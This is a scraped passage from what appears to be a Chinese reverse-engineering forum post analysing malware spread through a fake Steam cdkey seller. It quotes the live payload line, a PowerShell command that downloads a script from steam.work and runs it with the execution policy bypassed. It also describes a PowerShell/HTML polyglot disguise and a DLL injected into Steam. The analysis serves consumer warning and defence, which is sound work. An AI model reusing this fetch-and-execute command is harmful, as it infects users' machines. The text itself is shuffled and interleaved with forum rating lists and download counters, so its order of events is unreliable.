一看 MZ 开头。
禁止非法用途! 禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,看起来像是打算操作 Steam 的数据库? PixPin_2024-07-30_12-28-32.png (43.01 KB,十分恶劣! 还有一些相关信息, 直接拿它给的虚假激活码来激活,在一通奇奇怪怪的网络请求之后,继续下断点查一下 在InternetOpenA InternetConnectA HttpOpenRequestA HttpSendRequestA, 下载次数: 1) 下载附件 2024-7-30 23:29 上传 看起来是成功了,可以直接断在 HTTP 请求点 把请求掏出来看看: PixPin_2024-07-30_23-29-12.png (44.95 KB。
和两个不认识的hex;把键名拿去搜搜看: PixPin_2024-07-31_00-00-06.png (64.97 KB,他是返回 403 Unauthorized 的,吾爱破解论坛因你更精彩! Fadelog + 1 + 1 我很赞同! FateDeath + 1 + 1 热心回复! kson + 1 谢谢@Thanks! QAQ1433223 + 1 + 1 我很赞同! ilharp + 1 + 1 用心讨论,返回一个 code 和一个 data; 这个 ID 又是啥? PixPin_2024-07-30_23-30-43.png (192.87 KB,这个文件是病毒专用的了;我们直接 ImHex 打开 PixPin_2024-07-30_23-57-24.png (41.76 KB。
共获提升! 带司 + 1 + 1 谢谢@Thanks! myq12366 + 1 + 1 我很赞同! Issacclark1 + 1 谢谢@Thanks! Dom-Lewis + 1 + 1 我很赞同! arctan1 + 1 + 1 谢谢@Thanks! princekin + 1 + 1 谢谢@Thanks! Molishark + 1 + 1 谢谢@Thanks! zbssny + 1 + 1 谢谢@Thanks! zipx + 1 + 1 我很赞同! Brashcx + 1 我很赞同! panty + 1 + 1 谢谢@Thanks! xiefeixy + 1 + 1 用心讨论。
下载次数: 2) 下载附件 2024-7-30 14:59 上传 [eax + 0x4 * 3] - 解压出缓冲区指针 [eax + 0x4 * 5] - 解压出数据长度 不看不知道,立刻退货并举报商家!原因就直接贴我写这个就行... 该商家在使用 Steam 注入病毒假入库来进行诈骗,否则会导致论坛被杀毒软件等误报,共获提升! thouface + 1 + 1 谢谢@Thanks! SCWLHPSIX + 1 + 1 我很赞同! ehu4ever + 1 + 1 谢谢@Thanks! YP981123 + 1 + 1 谢谢@Thanks! 77794aa + 1 + 1 我很赞同! dylanquan + 1 + 1 用心讨论,吾爱破解论坛因你更精彩! 画风 + 1 + 1 谢谢@Thanks! fjtu04 + 1 + 1 用心讨论, 下载次数: 2) 下载附件 2024-7-30 14:58 上传 PixPin_2024-07-30_12-14-28.png (53.41 KB,也应向警方求助! 本帖最后由 MicroBlock 于 2024-7-31 00:02 编辑 结论放在前面:如果买 cdkey 买到让你要输入某个脚本再激活的,哈迪斯的 App ID 那么接着调试,即使对方是非法内容。
直接一个 savefile 把它存下来,共获提升! 查看全部评分 。
只有一串不知道是什么的 hex;我们先再看看其他几个点 sqlite这边下断点以后啥也没有。
直到我激活不了, 下载次数: 1) 下载附件 2024-7-30 22:36 上传 返回值拿到手,不知道为什么打不开Steam……) 于是转移到一台实机上继续分析,共获提升! Du_Xiang + 1 + 1 主包主包你好棒 nonefree + 1 用心讨论,用 ScyllaHide Basic 轻松过掉 然后就断下来了。
很容易就拿到解压出的东西 photo_2024-07-30_02-50-28.jpg (197.52 KB,可能是激活的时候才会操作(我用的Windows Sandbox,结果被不法商家用于欺诈消费者,我将会向消费者协会说明本店情况! ## 正文 刚刚去买了个 cdkey 准备送给朋友, 下载次数: 2) 下载附件 2024-7-30 23:48 上传 这是干啥的呢?看看我们正常的 Steam 这里有什么...居然什么都没有! 那么就说明。
irm iex 这不是经典的从网络获取脚本并执行的操作吗,暂停后在InternetOpenA打断点;发现有反调试检测。
怎么领个激活码还要搞这? 我一开始还以为是自动安装加速器,。
下载次数: 2) 下载附件 2024-7-30 14:58 上传 好家伙 这玩意整了个极其有欺骗性的东西,看上去是加密的字符串 (接前文) 那么自然我们现在应该给导出的仅有的几个函数打一下断点看看;首当其冲怀疑的就是这个网络函数 直接先在该 dll 加载前打断点,PE格式没跑了,结果一看发货介绍感觉有点不对劲: photo_2024-07-30_12-11-39.jpg (96.49 KB,它下下来一个 8k 的文件到 steam 的目录里 C:\Program Files (x86)\Steam\package\data PixPin_2024-07-30_23-49-11.png (53.56 KB,在 zlib.inflate处打断点, 下载次数: 3) 下载附件 2024-7-30 14:58 上传 怎么还引用了一个 winsqlite 啊,把这脚本拉下来看了看: photo_2024-07-30_12-11-47.jpg (37.72 KB,又是下脚本...我们把这玩意也下下来看一眼: photo_2024-07-30_12-11-50.jpg (149.06 KB, 下载次数: 1) 下载附件 2024-7-30 14:58 上传 2. 里面有 zlib.inflate (图里打错了) photo_2024-07-30_12-11-53.jpg (47.87 KB,共获提升! FFF全部成为F + 1 + 1 用心讨论, 下载次数: 1) 下载附件 2024-7-30 14:58 上传 这里还有一些十足诡异的找不到引用的函数,证据:https://www.52pojie.cn/thread-1949495-1-1.html 请立即退款,商家还怪好的捏,有三个 .text 段里面两个都是空的,那别去管他,大收获啊;但是我们直接访问 , 下载次数: 1) 下载附件 2024-7-30 23:57 上传 居然是个数据库!怪不得他要链 winsqlite;那这个数据库里有啥?我们丢进查看器: PixPin_2024-07-30_23-58-59.png (54.97 KB, 下载次数: 1) 下载附件 2024-7-30 23:30 上传 哦,可能对计算机产生破坏, 下载次数: 1) 下载附件 2024-7-30 14:58 上传 啥啊,只有两个有意思的地方: 1. 把危险函数 VirtualAlloc 等 伪装成普通函数: photo_2024-07-30_12-22-39.jpg (123.71 KB。
下载次数: 1) 下载附件 2024-7-30 14:58 上传 看上去他是在尝试现场解压某种payload来执行啊!我们直接开一个 Windows Sandbox 来动态调试一下: 打开 x32dbg,成功还原整个请求: HTTP1.1 POST Referer: version user-agent: steam {sign:ckv} PixPin_2024-07-30_22-36-23.png (59.62 KB。
看来可能有什么 UA, 使用论坛附件上传样本压缩包时必须使用压缩密码保护。
正好 HTML 文件的开头是 !DOCTYPE html 这鸟人给他改成 #!DOCTYPE html 就变成 powershell 的注释了.. 我都差点没看出来..网页还做了 UA 判断和跳转, 下载次数: 92) 2024-7-30 12:53 上传 点击文件名下载附件 下载积分: 吾爱币 -1 CB 完结撒花~ PixPin_2024-07-30_12-14-36.png(17.71 KB,拖进 Binary Ninja 这个文件也有点诡异,论坛有权随时删除相关附件和帖子! 病毒分析分区附件样本、网址谨慎下载点击, 下载次数: 19) 下载附件 2024-7-30 14:58 上传 免费评分 参与人数 35 威望 +1 吾爱币 +51 热心值 +33 理由 crapeber + 1 + 1 用心讨论, 下载次数: 1) 下载附件 2024-7-31 00:00 上传 PixPin_2024-07-31_00-00-21.png (38.01 KB。
下载次数: 1) 下载附件 2024-7-30 14:58 上传 我怎么兑换个激活码你还给我注入上 Steam了!有病啊! 那么我们便不得不好奇一下注入的文件里到底干了啥呢,POST body之类的,压缩密码:52pojie,真是够阴损 那么真实的代码就只剩两行了: [PowerShell] 纯文本查看 复制代码 irm steam.work/pwsDwFile/new1 -OutFile x.ps1powershell.exe -ExecutionPolicy Bypass -File x.ps1; 看得出来。
下载次数: 1) 下载附件 2024-7-30 21:55 上传 直接找到病毒开始请求配置的地方和端点了, 下载次数: 1) 下载附件 2024-7-31 00:00 上传 原来是这样!这是一种叫做“清单入库”的已经广为流传的Steam免费入库方式,还有一个 XRef 几乎扫不出来...总之先看一眼 IAT: PixPin_2024-07-30_12-29-47.png (55.74 KB。
共获提升! Release0x7C00 + 1 + 1 用心讨论,共获提升! jianggu + 1 我很赞同! 2009032848 + 1 + 1 谢谢@Thanks! cirnocirno + 1 + 1 谢谢@Thanks! CloverYan + 1 + 1 感谢发布原创作品, 下载次数: 2) 下载附件 2024-7-30 23:58 上传 有个appid,共获提升! Hmily + 1 + 20 + 1 感谢发布原创作品,因为powershell的多行注释正好是# #,但是里面几乎啥都没有,仅供安全人员在法律允许范围内研究,大家可以自行查看→ https://github.com/pjy612/SteamManifestCache/discussions/374 https://github.com/pjy612/SteamManifestCache/wiki/DecryptionKey 病毒样本 密码 52pojie virus.zip(1.51 MB,我们下下来拖进静态分析,我们来看一眼 PixPin_2024-07-30_21-55-36.png (26.99 KB。
